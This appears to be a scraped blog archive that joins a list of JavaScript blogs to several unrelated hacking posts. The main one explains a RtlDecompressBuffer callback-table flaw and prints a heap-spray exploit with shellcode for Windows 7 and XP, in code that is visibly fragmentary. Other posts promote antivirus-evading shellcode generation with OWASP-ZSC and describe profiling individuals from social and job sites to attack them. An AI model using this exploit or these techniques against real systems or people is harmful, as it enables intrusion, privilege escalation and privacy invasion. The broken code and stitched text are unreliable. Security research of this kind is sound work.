26 April 2020

Top10 Java Script Blogs To Improve Coding Skills

10 Top JavaScript Blogs to Improve Coding Skills

The Best JavaScript Blogs

With two decades of improvement, JavaScript has become one of the most popular programming languages of all time. The journey started in 1995 when Brendan Eich created JavaScript in just 10 days. From there, it has seen multiple revisions, drafts, and growth in the form of frameworks, API's, modules, etc. Today, we will go forward and list the top JavaScript blogs from the internet so that you can enjoy the lastest development in the field of JavaScript.

According to RedMonk programming language rankings and GitHut.info, JavaScript is leading the pack in the terms of repositories and the most discussed programming language on StackOverFlow. The numbers itself speaks about the future of JavaScript as it has grown beyond the initial capabilities of simple DOM manipulations.

Learning JavaScript, on the other hand, can be a tricky proposition. New libraries, features, API's or Style Guide, pop up almost every day. The speed of iteration is beyond imagination, and that is why reading leading JavaScript blogs are the best approach to keep up with new changes.


JavaScript is blessed with experts that regularly contribute to the community using live streams, videos, blogs, podcasts, conferences and open source projects. An example of a cool experienced Javascript programmer is evilsoft who broadcasts awesome Javascript projects weekly on LiveEdu..

Some blogs are just gold even when they are not updated frequently. To help you reach the best content on JavaScript, let's list the best JavaScript blogs on the internet. The following blogs have a huge fan following and contain epic JavaScript content.

10 Top JavaScript Blogs to Improve Coding Skills

1. David Walsh Blog

David Walsh is a renowned name in the JavaScript world. He started his career with DZone, but his first real break came while working for SitePen as a Software Engineer. His blog composes of topics related to JavaScript, personal thoughts, guides and much more. The blog design is captivating and is going to hook you up on the first visit. Currently, he is working as a Senior Web Developer at Mozilla.

top javascript blogs

2. DailyJS

DailyJS is one of the best JavaScript blogs on the internet. The blog was started by Alex R. Young, an entrepreneur and Node.js expert in 2009. However, there are recent changes that don't sound great. Currently, the blog is no longer updated, but that does not make the content useless at all. The blog covers diverse content on JavaScript including frameworks, API's, libraries, etc.


3. SitePoint

SitePoint is one of the leading web development portals since 2000. The main attraction of SitePoint is the collection of highly detailed articles. They are aimed at teaching something new to the readers. JavaScript, on the other hand, is one of the leading topics on the website where experts around the world contribute regularly. The rate of the new blog post is high, and you won't find a blog post that doesn't teach you something new. Truly, a great learning place for any JavaScript developer.


4. JavaScript.com

Not technically a blog, but if you love JavaScript, then you need to follow the website's offerings. JavaScript.com news section is an aggregator for excellent JavaScript news, tutorials, guides, and much more. All you need to do is move to their news section and discover tons of new content surrounding JavaScript. The domain is owned by CodeSchool and is mainly utilized to contribute to the community and a landing page to their courses.


5. Brendan Eich

What's the best place to find JavaScript knowledge? The inventor? Well, you are right. Brendan Eich, the creator of JavaScript, keeps his blog with filled with his musings and other excellent thought processes about JavaScript. You can also find videos on the blog. Virtually, the blog is the mind of JavaScript where you understand it in an entirely different manner.


6. JavaScript Playground

JavaScript Playground is yet another great place to get started with all the different JavaScript frameworks, API, and libraries. The focus is to work with the JavaScript ecosystem and provide high quality blog articles, screencast, and podcast for the audience. They also blog about different JavaScript guidelines, tips, and tricks.


7. Superhero.js

If you are looking for a superhero to fetch you the best resources on JavaScript, then you have finally found one. Superhero.js is a simple website that aims to collect everything related to JavaScript including videos, articles, presentations, etc. The content is divided into meaningful sections such as "Understanding JavaScript", "Organize Your Code", etc. Also, the page is regularly updated with new information.


8. JavaScript Jabber

Another "not a blog entry" into the list — JavaScript Jabber is a weekly podcast on JavaScript. Each podcast is around 1 hour of jabber and will sure have something for you to learn. They keep their tab on everything related to JavaScript, including core concepts to popular Framework discussions.


9. Medium JavaScript Collection

Is medium a blog? Technically, not, but it contains high quality JavaScript articles. Medium is a way to connect to the audience so be ready to read many opinions on how JavaScript should have been, and what's wrong with JavaScript. Other than the ramblings, it hosts amazing JavaScript content such as Speed Up Web Apps.


10. Smashing Magazine

Smashing Magazine is one of the oldest websites covering web designing and development. They have a dedicated section for JavaScript, which is constantly updated with tutorials of high caliber. The tutorials surround other web development ideas such as UX, Productivity, etc.



Here are the ten best JavaScript blogs to improve your coding skills. The blogs and mix of other content types will help you to keep up with new changes in JavaScript field, and improve yourself accordingly.

If you are new to JavaScript and want to get started as soon as possible, check out the JavaScript learn section on LiveEdu.tv. And, yes, it is the most popular programming language on LiveEdu.tv which can benefit from your attention! Also, don't forget to leave a comment on how the JavaScript category page can be improved. We are listening!

Dr. Michael J. Garbade

About Author Dr. Michael Jurgen Garbade is the founder of LiveEdu.TV, Kyuda, Education Ecosystem. He is future Venture Capitalist, Future Politician and always on the lookout for the Next Big Challenge. Obtained Masters in business administration and physics, and a Ph.D. in finance with professional work experience in high-paced environments at Fortune 500 companies like Amazon and General Electric. Expertize: Python, PHP, Sencha Touch & C++, SEO, Finance, Strategy & E-commerce. He speaks English and German and has worked in the US, Europe, and Asia. At Education Ecosystem he is the CEO and runs business operations.

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RtlDecompresBuffer Vulnerability


The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table

Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:

int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
int result; // eax@4

if ( algorithm & algorithm != 1 )
if ( algorithm & 0xF0 )
result = -1073741217;
result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
result = -1073741811;
return result;

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.

let's check the disassembly on Win7 32bits:

  • the movzx limits the boundaries to 16bits
  • the test ax, ax avoids the algorithm 0
  • the cmp ax, 1 avoids the algorithm 1
  • the test al, 0F0h limits the boundary .. wait .. al?

Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");

int main(void) {
        printf("max: %u\n", max());

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 

So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:

And the exploit code:

ntdll!RtlDecompressBuffer() vtable exploit + heap spray
by @sha0coder



#define KB 1024
#define MB 1024*KB
#define BLK_SZ 4096
#define ALLOC 200

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =

PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
printf("%s\n\n", msg);

PUCHAR spray(HANDLE heap) {
PUCHAR map = 0;

printf("Spraying ...\n");
printf("Aproximating to %p\n", landing_ptr);

while (map < landing_ptr-1*MB) {
map = HeapAlloc(heap, 0, 1*MB);

//map = HeapAlloc(heap, 0, 1*MB);

printf("Aproximated to [%x - %x]\n", map, map+1*MB);

printf("Landing adddr: %x\n", landing_ptr);
printf("Offset of landing adddr: %d\n", landing_ptr-map);

return map;

void landing_sigtrap(int num_of_traps) {
memset(landing_ptr, 0xcc, num_of_traps);

void copy_shellcode(void) {
memcpy(landing_ptr, shellcode, strlen(shellcode));


int main(int argc, char **argv) {
FARPROC RtlDecompressBuffer;
HANDLE heap;
PUCHAR compressed, uncompressed;
ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");

heap = GetProcessHeap();

compressed_sz = estimated_uncompressed_sz = 1*KB;

compressed = HeapAlloc(heap, 0, compressed_sz);

uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);

printf("Landing ...\n");

ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

switch(ntStat) {
printf("decompression Ok!\n");

printf("bad compression parameter\n");

printf("unsuported compression\n");

printf("Need more uncompressed buffer\n");

printf("weird decompression state\n");


The attack vector
This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7

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John The Ripper

"A powerful, flexible, and fast multi-platform password hash cracker John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here or here. " read more...

Website: http://www.openwall.com/john

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Spaghetti: A Website Applications Security Scanner

About Spaghetti
   Author: m4ll0k   Spaghetti is an Open Source web application scanner, it is designed to find various default and insecure files, configurations, and misconfigurations. Spaghetti is built on Python 2.7 and can run on any platform which has a Python environment.

Spaghetti Installation:

Spaghetti's Features:
  • Server:
  • Web Frameworks (CakePHP,CherryPy,...)
  • Web Application Firewall (Waf)
  • Content Management System (CMS)
  • Operating System (Linux,Unix,..)
  • Language (PHP,Ruby,...)
  • Cookie Security
  • Bruteforce:Admin Interface
    Common Backdoors
    Common Backup Directory
    Common Backup File
    Common Directory
    Common FileLog File
  • Disclosure: Emails, Private IP, Credit Cards
  • HTML Injection
  • SQL Injection
  • LDAP Injection
  • XPath Injection
  • Cross Site Scripting (XSS)
  • Remote File Inclusion (RFI)
  • PHP Code Injection
  • HTTP Allow Methods
  • HTML Object
  • Multiple Index
  • Robots Paths
  • Web Dav
  • Cross Site Tracing (XST)
  • .Listing
  • ShellShock
  • Anonymous Cipher (CVE-2007-1858)
  • Crime (SPDY) (CVE-2012-4929)
  • Struts-Shock
Spaghetti Example:
python spaghetti --url example.com --scan 0 --random-agent --verbose

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Footpriting is the technique used for gathering information about computer systems and the entities they belongs too. 
To get this information, a hacker might use various tools and technologies.

Basically it is the first step where hacker gather as much information as possible to find the way for cracking the whole system or target or atleast decide what types of attacks will be more suitable for the target.

Footpriting can be both passive and active.

Reviewing a company's website is an example of passive footprinting, 
whereas attempting to gain access to sensititve information through social engineering is an example of active information gathering.

During this phase hacking, a hacker can collect the following information>- Domain name
-IP Addresses
-Employee information 
-Phone numbers
Job information

Tip-You can use http://www.whois.com/ website to get detailed information about a domain name information including its owner,its registrar, date of registration, expiry, name servers owner's contact information etc.

Use of  Footprinting & Information Gathering in People Searching-
Now a days its very easy to find anyone with his/her full name in social media sites like Facebook, Instragram,Twitter,Linkdedin to gather information about date of birth,birthplace, real photos, education detail, hobbies, relationship status etc.

There are several sites like PIPL,PeekYou, Transport Sites such as mptransport,uptransport etc and Job placement Sites such as Shine.com,Naukari.com , Monster.com etc which are very useful for hacker to collect information about anyone.  
Hacker collect the information about you from your Resume which you uploaded on job placement site for seeking a job as well as  hacker collect the information from your vehicle number also from transport sites to know about the owner of vehicle, adderess etc then after they make plan how to attack on victim to earn money after know about him/her from collecting information.

INFORMATION GATHERING-It is the process of collecting the information from different places about any individual company,organization, server, ip address or person.
Most of the hacker spend his time in this process.

Information gathering plays a vital role for both investigating and attacking purposes.This is one of the best way to collect victim data and find the vulnerability and loopholes to get unauthorized modifications,deletion and unauthorized access.

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25 April 2020

OWASP-ZSC: A Shellcode/Obfuscate Customized Code Generating Tool

   OWASP ZSC is open source software written in python which lets you generate customized shellcodes and convert scripts to an obfuscated script. This software can be run on Windows/Linux/OSX with Python 2 or 3.

   What is shellcode?: Shellcode is a small codes in Assembly language which could be used as the payload in software exploitation. Other usages are in malwares, bypassing antiviruses, obfuscated codes...

   You can read more about OWASP-ZSC in these link:
Why use OWASP-ZSC?
   Another good reason for obfuscating files or generating shellcode with OWASP-ZSC is that it can be used during your pen-testing. Malicious hackers use these techniques to bypass anti-virus and load malicious files in systems they have hacked using customized shellcode generators. Anti-virus work with signatures in order to identify harmful files. When using very well known encoders such as msfvenom, files generated by this program might be already flagged by Anti-virus programs.

   Our purpose is not to provide a way to bypass anti-virus with malicious intentions, instead, we want to provide pen-testers a way to challenge the security provided by Anti-virus programs and Intrusion Detection systems during a pen test.In this way, they can verify the security just as a black-hat will do.

   According to other shellcode generators same as Metasploit tools and etc, OWASP-ZSC  using new encodes and methods which antiviruses won't detect. OWASP-ZSC encoders are able to generate shell codes with random encodes and that allows you to generate thousands of new dynamic shellcodes with the same job in just a second, that means, you will not get the same code if you use random encodes with same commands, And that make OWASP-ZSC one of the best! During the Google Summer of Code we are working on to generate Windows Shellcode and new obfuscation methods. We are working on the next version that will allow you to generate OSX.

OWASP-ZSC Installation:
   You must install Metasploit and Python 2 or 3 first:
  • For Debian-based distro users: sudo apt install python2 python3 metasploit-framework
  • For Arch Linux based distro users: sudo pacman -S python2 python3 metasploit
  • For Windows users: Download Python and Metasploit here.
   And then, enter these command (If you're Windows user, don't enter sudo):

An example of OWASP-ZSC
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CEH Practical: Gathering Target Information: Reconnaissance And Competitive Intelligence

CEH Exam Objectives:

Describe Reconnaissance. 

Describe aggressive/competitive intelligence.


 Reconnaissance is the process of gathering informative data about a particular target of a malicious hack by exploring the targeted system. Basically two types of Reconnaissance exist i.e. Active and Passive. Active reconnaissance typically related to port scanning and observing the vulnerabilities about the targeted system (i.e., which ports are left vulnerable and/or if there are ways around the firewall and routers). Passive reconnaissance typically you will not be directly connected to a computer system. This process is used to gather essential information without ever interacting with the target systems.

Understand Aggressive Intelligence 

Competitive intelligence means information gathering about competitors' products, marketing, and technologies. Most competitive intelligence is non intrusive to the company being investigated and is benign in nature. It's used for product comparison or as a sales and marketing tactic to better understand how competitors are positioning their products or services.

Online tools to gather competitive intelligence

Exercise 1.1

Using KeywordSpy 

To use the KeywordSpy online tool to gather competitive intelligence information:  
  • Go to the www.keywordspy.com website and enter the website address of the target in the search field 

  • Review the report and determine valuable keywords, links, or other information.


Exercise 1.2

Using spyfu

  • Go to your browser and type www.spyfu.com and enter the website address of the target in the search field.

Exercise 1.3

Using the EDGAR Database to Gather Information

1. Determine the company's stock symbol using Google.

2. Open a web browser to www.sec.gov.

3. On the right side of the page, click the link EDGAR Filers. 

4. Click the Search For Filings menu and enter the company name or stock  symbol to search the filings for information. You can learn, for example, where the company is registered and who reported the filing.

5. Use the Yahoo! yellow pages ( http://yp.yahoo.com ) to see if an address or phone number is listed for any of the employee names you have located.

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